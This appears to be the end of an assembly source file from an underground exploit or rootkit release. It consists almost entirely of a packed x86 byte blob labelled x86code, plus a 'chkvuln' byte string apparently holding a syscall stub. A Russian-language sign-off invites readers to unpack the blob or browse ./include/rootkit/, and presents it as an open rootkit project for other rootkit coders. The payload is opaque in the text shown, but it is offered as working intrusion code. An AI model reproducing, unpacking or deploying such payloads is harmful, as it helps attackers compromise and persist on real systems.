.ascii "\x11\x7d\x44\x53\xb6\x7f\x54\x51\xd9\xfe\x42\x0d\x94\xa6\x85\x3e"
.ascii "\x84\x42\x6d\xdb\x69\xa9\x05\x9a\xb6\xad\xf8\x72\xe0\x8e\x9b\x19"
.ascii "\x1a\xd6\x29\xbc\xa1\x13\xad\x38\x80\x9b\xe2\xbd\xc5\x9f\x27\x3b"
.ascii "\x82\xde\x41\xf4\xdd\xa3\xde\x37\x28\xd5\x86\x5a\xc5\x5a\xba\x5c"
.ascii "\xe1\x75\x2b\x6a\x92\xa3\xd1\xda\xc8\x11\x43\x54\x18\x58\xbd\xd6"
.ascii "\x56\x7f\x58\xbe\x94\xf2\xff\x3a\x10\x04\x39\x10\x5b\xbe\x22\xce"
.ascii "\x77\x53\x8f\xf1\x47\x90\x40\x29\xdc\xe4\xad\xb5\xc9\xfc\xa9\xc6"
.ascii "\xe2\x9a\xc4\x60\x32\x99\x7c\x4c\xb1\x9e\x5a\x2d\xf3\xfb\x1a\x8b"
.ascii "\x57\x50\x0c\x55\x2a\xd5\xa7\x64\xbe\xcb\x1c\x53\x9a\xbb\x2e\xbe"
.ascii "\x5e\xa3\x34\x9f\x5a\x05\x1a\xd6\x29\xf5\xfb\x6a\xa9\x84\xc2\x9f"
.ascii "\x02\xa1\x99\x7c\x77\x59\xb4\x41\x83\x87\xff\xfb\x94\xea\x23\x9a"
.ascii "\xe3\xb2\x35\xe6\x8a\x3c\xa9\x33\x3c\x51\x19\x39\xa4\x3f\x80\x17"
.ascii "\xb2\xf2\x69\x66\xd3\x95\x8c\x4d\xd2\x5d\xf2\xe9\x03\x3f\x02\x66"
.ascii "\x3e\x4b\xe1\x63\xd1\xfa\x33\x91\x98\x3e\xce\xe3\x46\x8f\xc8\xfc"
.ascii "\xae\x38\xbf\x93\xa3\xca\x9f\x40\x37\xec\xc5\x5d\x94\xfc\xa1\x39"
.ascii "\x76\xf1\x75\xa5\x7a\xe7\x01\xbc\x2d\x29\xdb\x3f\x0f\x7b\xa3\x6c"
.ascii "\xff\x48\xf9\xa8\xfc\x9e\xe6\x74\x9c\xc7\x7b\x64\x12\x2e\x39\xca"
.ascii "\x9f\x31\x45\xab\xdf\xeb\x9b\x2e\x9f\x37\x9f\xbc\x7c\x59\x3e\x0d"
.ascii "\x2d\x19\x14\x7e\x37\xb4\x7f\xe7\x51\x8d\xa9\xcf\x80\xf7\x27\x91"
.ascii "\x98\x09\x0a\x60\xd5\x6d\x9a\x79\x5d\x78\xc1\x71\xf9\x77\xf2\xaf"
.ascii "\x0f\x7e\x5a\x10\x3e\x76\x54\x03\x2d\x29\xe1\x5d\xd7\xeb\x1f\x2e"
.ascii "\x01\x75\x08\xed\x15\x25\xdc\xa3\x34\xef\xc4\x28\x89\x6b\xe5\x70"
.ascii "\x8f\x0c\xef\xcd\x3d\x63\xcb\x9e\x5b\x86\x3e\xb2\xc6\x94\xfa\x23"
.ascii "\x2e\x65\xbe\x6e\x02\x1e\x72\x6a\x0e\xcb\x7c\x8f\x5c\x7f\x24\xd2"
.ascii "\x7c\x42\x13\x1e\xaf\x54\x77\x83\x6b\x35\xef\xca\x07\x0f\xf6\x6a"
.ascii "\xe5\xd3\x39\x11\xaa\x58\xbb\xf1\x0e\xa4\x1b\x9c\x3c\x93\x3f\x52"
.ascii "\xf6\xec\x5f\x7f\x06\x95\x85\xbb\x57\x29\xf5\x5d\x75\x4a\x75\x69"
.ascii "\xed\x72\xda\x05\xdf\x57\xf8\x7d\x6a\xf7\xd9\x94\x70\x57\x5d\xba"
.ascii "\xe3\xf8\xee\x54\x38\xe0\x7d\x15\x9e\xb7\xac\xaa\xa3\x7e\x83\xb0"
.ascii "\x78\x28\xda\x7c\xe6\xe2\xeb\x07\xf0\xa6\x7b\xef\x30\x1a\x75\xba"
.ascii "\x1b\x47\xdd\x5d\x91\x63\x49\xa5\x59\x77\xe1\x8d\xcb\xbf\x58\x0a"
.ascii "\x9d\x81\x11\x1a\xf9\xaf\xe1\x1b\xc6\xc1\xc8\x56\xac\xba\x15\xbd"
.ascii "\x97\x08\xbb\x7f\xaa\xee\x01\xbc\xa3\x70\x64\xdb\xc2\x07\x7e\x31"
.ascii "\x4f\xae\xee\x31\xc7\xb2\x4a\xce\xac\xee\x09\xfe\xab\x52\xad\x4b"
.ascii "\xb9\xeb\xf6\x76\xc5\x7a\x22\x5a\xf8\x43\xe8\xac\x79\xd1\x95\xf3"
.ascii "\x7b\x64\xeb\x89\x1d\x9a\x48\xc2\x34\xab\x64\xc3\x27\x6c\xdc\x87"
.ascii "\x9d\xac\xef\xa3\xf5\xd0\x95\xdd\x1c\x1b\xc1\x60\x3e\x1d\xcd\x39"
.ascii "\x7e\x32\x9f\x34\xc7\x60\xd8\x41\xef\xef\xb0\x9e\xd6\x1c\xfa\xb6"
.ascii "\xf5\x84\x34\x56\x69\xee\x01\x0f\x2c\x8e\xc4\xb4\x72\x73\x8f\xcc"
.ascii "\x77\x63\x77\x6c\xf9\x79\xdf\x7c\x76\xfe\x44\x2b\xe9\x5b\xd8\x81"
.ascii "\x17\xa2\xb4\x41\x69\x32\xa8\x34\xb3\xc6\x13\xbe\x73\x6b\x57\x6a"
.ascii "\x46\x09\xeb\x95\x3d\x38\xf7\xb4\x5e\x92\xde\x55\xe6\x2e\xa1\x72"
.ascii "\xe1\x33\x68\x7a\xbd\xae\x36\x39\x5a\x97\x3b\xe8\xd4\x81\xc9\xce"
.ascii "\xef\xe9\xf8\xdb\x8f\x71\x59\xab\xd4\x97\x9a\x93\xad\xff\x02\xe6"
.ascii "\x43\x2c\x6a\x4c\x40\xe7\xf5\x19\xe5\x33\x10\x8b\x97\xe4\x5f\x82"
.ascii "\xbb\x4b\x5a\x93\x92\x01\x03\x51\x0f\x41\x78\x20\x27\x04\x3f\x91"
.ascii "\x4f\x1f\xfc\x7d\x41\xf8\x24\x84\x20\x34\xf9\xc0\x7b\xab\xd7\xca"
.ascii "\xdd\xa9\xfe\x3c\x29\x9f\x83\xaa\xfa\x46\xb2\x66\x33\xce\x4c\x79"
.ascii "\xb2\x5f\xee\xc9\xb9\x7f\x5b\xb5\x4a\x75\xad\xa6\xec\xb9\xd7\x70"
.ascii "\xca\xa1\x2e\x8d\xed\x9d\x4b\x27\xca\x0e\xdc\xe0\xd3\x53\xba\x0e"
.ascii "\x9c\x15\x3a\x11\x76\xe0\x87\xb6\x13\xad\x8c\x0f\x4b\x9d\x51\xc5"
.ascii "\x87\x21\xbb\xa6\x18\xdf\x90\xdd\x5e\x90\x99\xa9\xbf\xd9\x11\x00"
.ascii "\xd4\x39\x86\x8a\xe1\x6b\x00\xca\xf6\xcd\x6e\xc7\xf8\xe8\xa8\xd0"
.ascii "\xd2\xbb\x90\x4e\x2c\x4e\xcf\x06\xc5\x9d\x58\x7b\x29\x15\x46\x66"
.ascii "\x8b\x06\xdf\x90\x13\x83\x20\x4d\x45\x31\x4e\x3c\xf4\xde\xaf\x6f"
.ascii "\x44\xce\x69\x9e\x55\xa1\xa7\xf1\xf2\xb9\xc8\x55\xcd\x96\x45\xb4"
.ascii "\xc2\xc8\x55\xad\xaa\x36\x35\x85\xb6\x83\xba\x77\xa2\x9a\x5b\xca"
.ascii "\x3a\x50\xad\x4e\xd4\xaa\xef\x2e\xf0\x9f\x6a\x25\xb6\xdb\x51\x9a"
.ascii "\xb2\x9c\x3a\x36\xd5\x7f\x5d\xf8\xb5\xc2\x4e\x1c\x77\xb6\x56\xed"
.ascii "\xf1\xad\xd7\x68\x4c\xac\x8e\x5a\x2f\x44\x03\xeb\x64\x6b\xc2\x7c"
.ascii "\x8c\x46\x91\xfc\xeb\xbc\x60\xdc\x4f\x3f\x03\xd5\x17\x94\xe6\x44"
.ascii "\x9f\x9e\xf9\x3f\x72\x48\x1b\xb9\x3a\xf6\xe9\x7b\x1f\x2e\xb5\x84"
.ascii "\x87\xef\x78\x06\x3f\x2b\x33\x16\x6b\xc2\x89\xa3\xcf\xa0\x30\x39"
.ascii "\x4a\x73\xd0\x41\x10\x57\xa5\xb9\x71\x45\xfd\x47\xfb\x1b\xc6\x2f"
.ascii "\xea\x59\xfb\x36\xfd\x92\xfe\x16\xa4\x61\x40\xf0\x06\x97\xcc\x5f"
.ascii "\x50\x16\x97\x46\xe2\xa5\x32\xdf\xbf\x27\x79\xf1\x75\xd7\xd6\xe6"
.ascii "\x0b\xc3\xef\x2e\xdb\xf6\x06\xfa\x00\xeb\x6d\x8d\x6d\x11\x0f\x18"
.ascii "\xd5\x71\x7e\x83\x69\x6c\xcc\x2a\x11\x3f\xac\x8d\x44\xc4\x63\xba"
.ascii "\xe4\x68\x74\xa0\x7c\x08\x54\x38\x50\x37\x74\x99\xba\x54\x19\x67"
.ascii "\x5e\x99\x2d\x43\x95\x91\xee\x39\xd0\x36\x64\x7d\xc3\xde\x1a\xa0"
.ascii "\x9f\x93\xfe\xd6\x93\xf2\x82\xd2\xf0\x58\x97\x02\x46\x59\x4b\xe9"
.ascii "\x8c\xb9\xbc\x86\x7d\xe6\x0c\xaa\x67\xfa\x0a\xda\xe5\x9e\xdc\x61"
.ascii "\x07\xf1\xb0\x84\xc6\xc3\xf2\xad\x57\x11\x2f\x97\xc6\x6f\x7d\x2b"
.ascii "\x3d\x8e\x47\x28\xf3\x3d\xf2\xfc\x47\xe3\xf3\x3d\xf4\xdb\xb9\x62"
.ascii "\x89\x2a\x14\xfe\x60\x05\xb8\xaf\x06\xa6\xd2\xe5\x38\x99\x25\x47"
.ascii "\x63\x8c\xa8\x15\xe1\x45\xe2\x41\x55\x4a\xe2\x20\x2c\xb2\x2a\x2b"
.ascii "\x52\xe6\x3f\x2a\xcf\xf7\x64\x6a\xf9\xad\xdc\x8d\x11\x4a\xb2\x9f"
.ascii "\x2f\x79\xae\x1d\xb0\x07\xbd\x36\x75\xc7\xe1\xbe\xd1\x2d\xdc\x26"
.ascii "\xcb\xb4\xb0\x28\x2e\x7d\xac\x76\xe1\xe2\xda\x06\xa7\xef\xcf\xbe"
.ascii "\x5b\x9b\xbe\x98\x2b\x0f\x04\xfd\x0e\xdc\x19\x95\x4b\x8e\x00\x29"
.ascii "\x0f\x87\x82\xb0\x6b\xb7\x07\x85\x72\x8f\xdf\x61\xf7\x08\xe5\x82"
.ascii "\xaf\xdc\x48\x39\x69\xb9\xb0\x73\x28\x39\xca\xc1\x7d\x47\x93\x57"
.ascii "\xf0\xaa\x6f\xf8\x62\x24\x46\xa3\x5a\x1e\x96\xc5\x6e\xd8\x1d\x82"
.ascii "\xa6\x9c\x69\xe3\x34\xbb\x6b\x86\xd1\x68\xe4\x9c\x7e\x9f\xa0\xff"
.ascii "\x13\x38\x9a\x0f\xfa\x29\xcf\x66\x6b\x4a\xd5\xf6\xe5\x0f\xeb\x6f"
.ascii "\x74\x56\x7f\x31\xeb\x6a\x63\xa8\xb3\xfa\x57\x80\x71\x5e\xab\xde"
.ascii "\x15\x7e\xde\x59\x7d\x45\x49\xe6\xdc\x9d\x90\xa1\xcf\xea\xe7\x82"
.ascii "\xdc\xba\x2c\x39\x8e\xd1\xfc\xb3\x7a\x94\xfb\x22\x67\xf5\x2b\x4b"
.ascii "\x70\x95\x7e\xbd\x1c\x9f\x27\xb7\x19\xe4\xde\xbc\x81\x5c\x35\xc9"
.ascii "\x3d\xd9\xb6\xe4\x6d\x18\x53\xbc\x55\x37\x90\xfb\x22\x67\xff\x3e"
.ascii "\x7d\xae\xbd\x43\x9d\xfd\x9f\x81\xc9\x31\xa0\x55\xef\x70\xb1\xaf"
.ascii "\x86\x3a\xfb\x5f\x52\x46\xc8\x63\x59\x8a\xdc\xaa\xb3\xff\x92\x9c"
.ascii "\x9c\xeb\xcf\xfe\xc7\xb0\xf7\xd4\xd9\x7f\x6a\xef\xaa\xfe\xe6\x35"
.ascii "\xbf\xbe\x62\x32\x93\xbd\x6f\xd1\x10\xfa\x1b\xba\x79\x39\xf2\x85"
.ascii "\x64\x31\x51\x63\x61\x2e\xc3\x2b\x48\xe6\xf7\xab\x88\xbf\x4f\xd4"
.ascii "\x2f\xe9\x08\xad\x5a\x5e\x20\x99\xdf\xa4\x22\x1f\x7f\xb0\x85\xdf"
.ascii "\x6c\x07\xab\x1f\x7f\xb0\xa5\xcb\xe2\xb7\x10\xd5\xb7\x29\x8c\xbf"
.ascii "\x2f\x32\x64\xe1\xe7\x88\x7a\x2f\x91\xc2\xb9\xfa\xeb\xc8\x5f\x12"
.ascii "\x75\x75\x70\x37\xab\xff\x65\xa2\x2e\x03\x22\x44\xc5\x3f\x21\xea"
.ascii "\xf7\x5d\x61\x38\xb7\x7c\xfe\x5d\x48\x09\x8d\x45\xf4\x1d\xde\xd5"
.ascii "\x8f\x04\xff\x1d\xcf\xe2\xa3\x5e\x27\xf3\x70\x5f\x1e\xd6\x6a\x72"
.ascii "\xb1\x2e\x0f\xe3\x6f\x88\xb1\xd9\x7a\xa2\xde\xa5\xe0\x72\x6f\xdd"
.ascii "\x30\x75\xac\x20\xc6\x9f\xba\xb4\x03\x3e\xc8\x70\x45\x5e\xf9\x05"
.ascii "\x79\xf8\xbb\x58\x1e\xec\xab\x63\xf2\xec\x20\xe5\x0b\xdf\xcc\xe0"
.ascii "\x09\x97\xcb\x63\x5f\x4f\x7c\x36\xf5\x37\xa0\xf4\xa3\x40\xbc\x30"
.ascii "\xb1\x85\x9a\x3c\xee\x90\x44\x1a\x18\xc3\x67\x5b\x2f\x48\x4e\x98"
.ascii "\xdd\x42\x90\x95\x7e\xf5\xd9\x1c\xa2\xd3\x1d\x84\xac\x14\xa5\x3f"
.ascii "\x06\x6d\xb0\xf9\x03\x82\x2f\x4b\xb0\xaa\x02\x44\x69\x9e\x2f\x37"
.ascii "\x4f\xfd\xed\x68\x4a\xbb\xcc\x77\x89\x34\x79\xed\x1e\xf8\x54\xe0"
.ascii "\x8f\x5d\x05\x9f\x10\x74\x3b\xc0\x9a\xc0\x26\x1b\xfe\x6a\x15\x7f"
.ascii "\x61\x1a\xcc\x67\x48\x7e\x35\xbb\xc9\x15\x14\x04\xf5\xc6\x09\x6d"
.ascii "\xb0\x85\x7d\x68\xa7\xd7\x6e\x73\x4b\x7e\x3b\x52\xbb\xe4\x77\xe7"
.ascii "\xdc\x48\x85\x36\x85\x6c\xf0\x49\xf2\x80\x7c\x03\x40\x7a\x84\xd8"
.ascii "\x74\xdd\xcd\x14\x1b\x53\x30\x00\x17\x22\x85\x50\x7c\x8d\xd1\x9f"
.ascii "\x32\x1a\x63\xb4\x9b\xd1\xf7\x18\xbd\xc4\x68\x92\xd1\x42\x8d\x5a"
.ascii "\xcf\x83\x48\x61\x6c\x98\x18\xc6\x1f\x69\x20\xff\x55\x46\x7f\x8a"
.ascii "\x31\x7d\x0f\x21\x87\x18\xfd\x18\xe9\xb7\xd4\xb1\x86\xf2\x53\x18"
.ascii "\x5d\xa9\x55\xe5\xd7\x43\x5d\xda\x7b\x09\x79\x1c\xe9\x58\x42\x9e"
.ascii "\x62\xf4\xb5\x02\x55\x6e\x56\xa1\x2a\x57\xc3\xe8\x2e\xa4\x1c\x21"
.ascii "\x7f\xc7\xe8\xaf\x18\xfd\x98\xf1\x5f\x1c\xa6\xd2\x4e\x46\xff\x1e"
.ascii "\xe9\x78\x98\xaf\x19\x7e\x9b\xe1\x18\xc3\xff\xc4\xf0\x71\x86\x7b"
.ascii "\x18\x3e\x85\x14\x74\x7c\x9f\xe1\xdf\x30\xfc\x31\xc3\x09\x86\x7f"
.ascii "\xcf\xca\x5d\x62\xf9\xd7\x18\xd6\x14\xa9\x78\x58\x91\x2a\x37\x92"
.ascii "\xe1\x6f\x14\xa9\xfc\x7b\x19\xbe\xbf\x48\xb5\x73\x32\xcb\x37\xb2"
.ascii "\x7c\x0b\x2b\x37\x83\xe1\x59\x0c\xcf\x03\xaa\x9d\x00\x73\x13\x93"
.ascii "\xf7\x33\xfa\x04\x93\xdb\xcc\xf0\x56\x86\xb7\x33\xac\x30\xfc\x43"
.ascii "\x86\x5f\x64\xb8\x83\xe1\xd7\x18\xfe\x5b\x86\xf7\x30\xfc\x47\x86"
.ascii "\xc7\x16\xab\x74\x0a\xa3\x66\x46\x67\x31\xba\xa3\x58\x8d\x8b\x1f"
.ascii "\x15\xab\xf6\xfc\x23\xa3\x3f\x67\xfc\x38\xc3\x7d\x8c\xfe\x81\xe5"
.ascii "\x5f\x63\xf8\x2e\x9d\x4a\xeb\x74\x6a\x7e\x48\xa7\xf6\xeb\x66\x46"
.ascii "\x3b\x18\x7d\x93\xf1\xf7\x31\x1c\x67\xf4\x77\x8c\x7e\x95\x0f\xce"
.ascii "\x43\xb7\xba\x8d\x9b\xfc\xff\x9f\xe9\xff\xdd\xbe\xf9\x85\x48\x55"
.ascii "\xc5\x71\x7c\x56\xc7\x5c\xff\x24\x16\x3e\x98\x84\x2c\xa6\x64\x90"
.ascii "\xdb\xfe\xf1\x5f\x06\xc5\x3e\x8c\xd9\x4b\x2d\x14\x24\x2d\x48\x6b"
.ascii "\x56\x23\x89\x0f\xa5\x88\xc4\xec\xaa\x73\x6f\xee\x8e\x33\xa5\x14"
.ascii "\xb1\x0f\x9d\x25\xa1\x87\x1e\x96\x48\x0c\x5a\x72\x89\x25\x0d\xc7"
.ascii "\x94\x28\x30\xf0\x21\x62\x1f\x86\x38\xb6\x53\xcc\xc3\x12\x33\x6b"
.ascii "\xee\xfa\xfb\x9e\xdf\x3d\x73\x7f\x77\xbd\x77\x2b\x91\x25\xe2\xfe"
.ascii "\xe0\x37\x73\xcf\xf9\x9d\x73\xee\xf9\xdd\xf3\x3b\x77\xce\xdc\x73"
.ascii "\x3f\x6d\x6d\x2d\x96\xff\x69\xdf\xd8\xda\x6a\xde\xff\x69\xdf\x14"
.ascii "\x3f\xff\x9d\x0b\x89\xe4\x7f\xdc\xb9\xe3\x7f\xfa\xe9\x47\x1f\x2a"
.ascii "\xf9\x9f\x3c\xa5\xf3\x2a\xd9\x08\xc5\x7d\x7b\xed\x0c\xfe\xa7\x4a"
.ascii "\xf6\x2a\xd9\xa0\x73\xc5\xff\x40\xb1\x26\xb7\xef\xa2\xcc\x4f\x04"
.ascii "\x39\x1d\xcb\xe4\xa0\x0d\x30\x28\xf6\xef\xc4\xbd\xde\x77\x14\xa7"
.ascii "\x63\x65\x41\x48\x9e\xed\x83\xe5\x8b\x16\x85\x94\x81\x60\x3d\xd6"
.ascii "\xe7\xf8\xac\xcf\x63\xa4\x03\x8e\xcf\xfa\x9c\x21\xfd\xd4\xf1\xd9"
.ascii "\x9e\x4d\xa4\xc3\x8e\xcf\xee\x80\xcd\x29\x3a\x3e\xbb\xf3\x1e\xe9"
.ascii "\x35\x4a\x9f\x4b\xf8\xec\x8d\x76\x7c\x96\x07\xeb\xd1\xaa\xe3\xb3"
.ascii "\x3c\x19\xf8\x2b\x58\x1e\xbc\x0b\x83\x77\x2f\x2d\xab\x83\x27\x90"
.ascii "\xeb\x05\x7b\xb4\x9b\x74\xab\xeb\xb3\x3b\xaf\x93\x8e\xe5\x7d\x16"
.ascii "\x07\xeb\xdb\x1d\x64\xdf\xe0\xd9\xf1\xbf\x64\xa7\xa8\xff\xcf\xd9"
.ascii "\x9c\x19\x30\x0e\x73\x38\xbc\xb4\x8a\x42\x6e\xde\x7c\xb5\x7b\x4f"
.ascii "\x9d\xbb\x79\xcb\xac\x4b\x5e\xfb\x77\xb0\x0d\x55\xde\x47\x6b\x2e"
.ascii "\xb3\xf0\xba\x13\xf0\x26\x92\xb8\x69\x30\x9f\x89\x48\xde\xe6\xcb"
.ascii "\x44\x90\xb7\xb1\x4f\x2b\x26\x68\x9e\xdc\x43\x86\x11\xc5\xbc\xcd"
.ascii "\xa8\x62\xde\xe6\x82\x62\xde\xa6\xa8\x98\xb7\xb9\xa2\x98\xb7\xf9"
.ascii "\x41\x31\x6f\x73\x55\x31\x6f\x73\x4d\x31\x6f\xf3\xb3\x62\xde\x66"
.ascii "\x4c\x31\x6f\x53\x52\xcc\xdb\x68\xc5\xbc\x4d\x59\x31\x67\x53\x51"
.ascii "\xcc\xd9\x78\x1c\xcd\x23\x86\xa3\xc1\x43\x4f\xbd\xb8\x91\x39\x9a"
.ascii "\x2f\x14\x38\x9a\x61\x65\x39\x1a\xf4\x4c\x72\x34\xe8\xa1\xe4\x68"
.ascii "\xd0\x53\xc9\xd1\xa0\xc7\x92\xa3\x41\xcf\x25\x47\x03\x0f\x24\x47"
.ascii "\x03\x4f\x24\x47\x03\x8f\x24\x47\x03\xcf\x24\x47\x03\x0f\x25\x47"
.ascii "\x03\x4f\x25\x47\x03\x8f\x25\x47\x03\xcf\x25\x47\x83\x2b\xe0\x73"
.ascii "\x34\x36\x56\x25\xff\x32\x92\x47\x0d\x87\xf9\x97\xe3\xc9\x46\x7d"
.ascii "\x28\x84\x7f\xb9\x7f\x25\xf8\x17\x2c\x7d\xa3\xf8\x97\x01\x15\xe0"
.ascii "\x5f\x3e\x50\x33\xf9\x17\xe4\x80\x7f\x31\x16\xe6\x5f\x30\xf5\x2d"
.ascii "\xff\xf2\x11\x65\xeb\x21\xc9\xbf\x98\x16\xa3\xf9\x17\xdc\x67\x04"
.ascii "\xff\x32\x30\x48\x6e\x98\x46\xb6\x4c\xc5\xfc\xcb\xdd\xe7\x5f\x9e"
.ascii "\x3f\x5a\x3e\x00\x10\x23\xd3\xd8\xd0\xd3\xc2\x60\x45\x89\x22\xe7"
.ascii "\x44\x6a\x69\x76\x34\x39\xdd\xa2\x5b\x6f\xd6\x79\x88\x83\xcb\x2f"
.ascii "\xa6\xc6\xcc\x8e\xc7\x32\xaf\x3e\xa5\xcd\x33\x73\x8f\x7a\xf9\x49"
.ascii "\x12\x2e\xbf\x32\x9e\x71\x4a\xe6\xd5\x38\x2f\x23\xf3\x1a\x0a\x26"
.ascii "\x6f\xaf\x97\x97\x19\x9b\x87\x0d\x31\x7d\x04\xe7\x59\x48\x07\xb8"
.ascii "\xb7\x9f\xac\x9f\xaf\x94\x30\xe7\x4b\xa6\x47\xa8\xd3\xe9\x0e\xea"
.ascii "\x4d\x7a\x05\x35\xa0\xbf\xaa\x43\x2e\x8c\x9f\x1c\x5e\xcb\xad\x37"
.ascii "\x73\xeb\x4b\xfe\x12\x04\xc7\x20\x25\x38\xde\xd0\xd0\x92\x55\xe6"
.ascii "\xf9\x73\x07\x5a\x39\xe0\xb7\xc2\xf4\xcd\xea\x40\x2b\xdf\xde\x10"
.ascii "\xad\xec\x44\xd9\x72\x72\xfa\xa0\x2e\xb8\xeb\x69\xe0\x0c\x05\xf3"
.ascii "\x4a\xdd\x33\x99\x5f\xd1\x27\x6e\x84\xe5\x4f\xe8\x76\x1f\xbc\xe9"
.ascii "\x5d\x70\x7d\x9e\x19\x08\xba\x00\x0f\xe7\xdc\x14\x15\xe9\x4b\x15"
.ascii "\x73\xee\x76\x73\x70\x29\xe7\x3e\x6d\x0e\xbe\xcb\xb9\x3b\xcc\xc1"
.ascii "\xe5\xf1\x75\x27\xad\xb5\x68\xad\x97\xac\x95\x8a\x3d\xc3\xc5\xe0"
.ascii "\x41\x32\xfd\x5c\x01\x08\x4e\xb1\x53\x77\x0b\x04\xc7\xd9\x87\xed"
.ascii "\x91\x4c\x69\x51\xef\x83\xa6\x67\xa5\xf4\x0b\x28\xe6\xf6\xd1\x4c"
.ascii "\xeb\xd4\xc7\xb9\xe4\xf8\x2a\xcf\xd6\x25\x6c\x6f\xb0\x8d\x02\xbc"
.ascii "\x8c\x00\xa0\x30\x7e\x22\xa5\x7b\xd6\x58\xff\x4c\x21\xf8\xfd\x3e"
.ascii "\x13\x2b\x85\x54\x89\x66\xdc\x14\xe5\xb2\xad\xff\x3c\x4d\x20\xbe"
.ascii "\x0c\xfd\xdf\x50\xe5\x5c\x72\x79\x5f\xf2\x81\x42\xaa\x4c\xb3\xe6"
.ascii "\xac\x81\x6e\x2a\x3a\x5d\xa7\x61\x70\xa1\x5e\xaa\x33\x33\x62\xe4"
.ascii "\xbb\x31\x66\xa3\x93\x33\x46\x3e\x38\x66\xf7\x49\x76\xe7\x93\x49"
.ascii "\x33\x66\x76\xcc\xdf\x46\xfd\x23\x93\xb3\x8e\xf9\x8f\x35\x51\x7f"
.ascii "\x0f\xca\x62\x80\x16\x8a\x48\x44\xa4\x8a\x21\x7d\xd9\xef\x69\xc0"
.ascii "\x52\xd1\xef\xd4\xc2\x2d\x13\xfa\xd1\x49\x3f\x0c\x9a\xad\xff\xb5"
.ascii "\x80\xff\x7e\x37\xe6\xeb\x02\x27\xae\xff\x4e\xd1\x93\x73\xb7\xd8"
.ascii "\x10\xd8\x6a\x43\xe0\x71\x1b\x02\xdb\x42\x43\x60\x57\x4d\x84\xc0"
.ascii "\xfe\x69\x76\xa9\xe7\xa1\x90\x1e\x5f\xad\xf2\x89\x10\x4a\x66\x7f"
.ascii "\x3b\x2a\x56\xba\x6a\xd1\xb1\xf2\x54\x2d\x10\x2b\xd9\x4c\xb9\xb7"
.ascii "\x67\x33\x80\xa5\x72\xbd\xc8\x90\x39\xcf\xd2\xfe\xd1\x4e\x11\x3b"
.ascii "\x2f\x56\x45\xec\x5c\x44\xd4\xfc\xf9\xf7\xd1\x73\x3a\xb8\xbf\x77"
.ascii "\xfa\x63\x25\xf9\x28\xa4\xee\x88\x8f\xfa\xcd\xe3\xa3\xc6\xab\xb7"
.ascii "\xf1\x51\x6d\xb3\xf1\x4e\x21\x3b\x2e\xd1\x7b\x2b\x21\xb4\x53\x70"
.ascii "\x5b\x66\x7b\x6a\x73\x47\xa2\xa9\xa9\x69\xdd\xde\xc5\x09\xfe\x9c"
.ascii "\x65\x03\x26\xb0\x51\x23\x64\x48\x45\x73\x53\x55\x61\x7b\x97\x7e"
.ascii "\x87\x07\x49\x3f\x23\xfd\x9a\xf4\x7b\xd2\x5f\x48\xff\x20\x9d\x22"
.ascii "\x5d\x46\xeb\xe5\xd5\xa4\xcd\xa4\x4f\x92\x3e\x4b\xba\xcb\xbd\x9d"
.ascii "\x91\xc2\x12\x04\xff\x51\x46\xf2\x41\x46\xaa\x78\x8c\x19\xa9\x61"
.ascii "\x8f\x91\xc2\xda\x32\x8c\x91\xfa\x5c\x31\x23\x05\x27\x24\x23\x55"
.ascii "\xc9\x32\x23\xa5\xb3\xe1\x8c\xd4\x70\x36\xc8\x48\x7d\x98\xfd\x6f"
.ascii "\x32\x52\xb1\xc4\x12\x4b\x2c\xb1\xc4\x12\x4b\x2c\xb1\xc4\xf2\x7f"
.ascii "\x91\x5b\xce\x67\x85\x34\x00\x50\x00"

x86len = .-x86code

chkvuln: .ascii "\x91\x35\x96\xcd\x80\xaf\x13"


     И  нихрена  это  не  TESO  )) Можете применить свои 1337-cr4ck1ng-ski11z и
  распаковать,  или  просто  смотрите  ./include/rootkit/. Не смотря на то, что
  тема не нова, imho различным кодерам всяких там Шершней (hornet project)будет
  интересно взглянуть (или первый OPEN-ROOTKIT проект нагнулся?? ^^).

~halt